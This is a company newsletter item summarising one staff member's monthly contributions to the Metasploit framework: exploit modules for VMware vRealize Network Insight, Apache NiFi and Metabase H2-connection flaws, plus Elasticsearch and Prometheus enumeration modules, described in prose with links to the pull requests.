METASPLOIT PROJECT
The Metasploit Project, owned by Rapid 7, is a computer security program which is the world’s most used penetration testing framework. This Free and Open-Source Software (FOSS) is used by nearly all penetration testers, and is extremely common in training courses from SANS, EC-Council, and many others.
The Metasploit Project, being Open-Source Software, flourishes from the contributions of the community. nDepth’s own Mike Cyr (h00die) is a frequent contributor to the project and has continued to spend their personal time conducting security research and providing enhancements to Metasploit for the benefit of the security community. This month, h00die contributed the following enhancements:
VMWARE VREALIZE NETWORK INSIGHT REMOTE COMMAND EXECUTION
VMware’s vRealize Network Insight product contains a flaw tracked as CVE-2023-20887, which grants an unauthenticated user the ability to execute arbitrary code on the server. A version of this exploit was submitted to Metasploit; however, the original author was unable to satisfy all the requirements in order to have the code accepted. While this doesn’t happen often, it can be disappointing since the code often works and just needs a few minor changes. H00die was able to take the previously submitted code and make the enhancements to have it accepted by the Metasploit project.
H2 DATABASE ENGINE EXPLOITS A PLENTY
Often when a penetration tester learns a new technique or how to exploit a new vulnerability, they will look for different products to use the newly acquired knowledge against. In this case, the open source Java based database engine H2 was found to have a flaw in how products connect to it. Armed with this knowledge, h00die created a new exploit against the H2 web interface which exploits a feature of the database engine and is less likely to be fixed by the project compared to a security flaw. Next, Apache Nifi also allows for connections to H2 databases which can be exploited for remote code execution (CVE-2023-34468). While the vulnerability was public, no proof of concept (exploit code) was available to the public. H00die was able to reverse the vendor’s patch to create a first of its kind exploit against Apache Nifi’s H2 database connections. Lastly, Metabase, a tool for creating business intelligence, dashboards, and data visualization, contained a flaw allowing for remote code execution (CVE-2023-38646). The program allowed users to learn of a ‘setup-token’ which was only supposed to be present while the software was being setup, however, was present all the time. With this token, it was possible to create a new H2 database connection which then exploited the same vulnerability class as Apache Nifi.
ELASTICSEARCH ENUMERATION ENHANCEMENTS
Elasticsearch is a search and analytic engine similar to a database. Metasploit contains an enumeration module for Elasticsearch meant to gather information about the service and present it to the user. However, h00die found that it needed some enhancements as it only identified the aliases (database short names) and didn’t work with authentication. The module was enhanced to allow the user to provide authentication, gather information about the version number of the service, gather information about the cluster (several servers combined to enhance the speed and reliability of the service), gather information about each node in the cluster, list all users, and lastly download samples of the indices.
APACHE NIFI PROCESSOR EXPLOIT ENHANCEMENTS
While testing the Apache Nifi H2 exploit, h00die noticed that the documentation for the Apache Nifi processor exploit module lacked what versions it worked against. While the exploit takes advantage of a feature, and not a security flaw, knowing what versions it is known to work against can be priceless to a penetration tester. H00die added the previously tested version numbers and the version number he was working with to the documentation.
PROMETHEUS API & PROMETHEUS AND WINDOWS NODE EXPORTER INFORMATION GATHERING
During a penetration test, h00die found the program Prometheus. Prometheus is a monitoring system and time series database, similar to SNMP, only using the HTTP protocol and allowing for graphing all in one product. Prometheus Node Exporter and Prometheus Windows Exporter allow for data to be pulled from the system (similar to SNMP Server). When a penetration tester finds any of these services, they are presented with thousands, to tens of thousands of lines of information to analyze. After determining what information may be useful to a penetration tester, h00die created two modules to show the important information, saving a substantial amount of analysis time.
To view this month’s contributions, check the following links:
- https://github.com/rapid7/metasploit-framework/pull/18310
- https://github.com/rapid7/metasploit-framework/pull/18290
- https://github.com/rapid7/metasploit-framework/pull/18257
- https://github.com/rapid7/metasploit-framework/pull/18239
- https://github.com/rapid7/metasploit-framework/pull/18232
- https://github.com/rapid7/metasploit-framework/pull/18226
- https://github.com/rapid7/metasploit-framework/pull/18199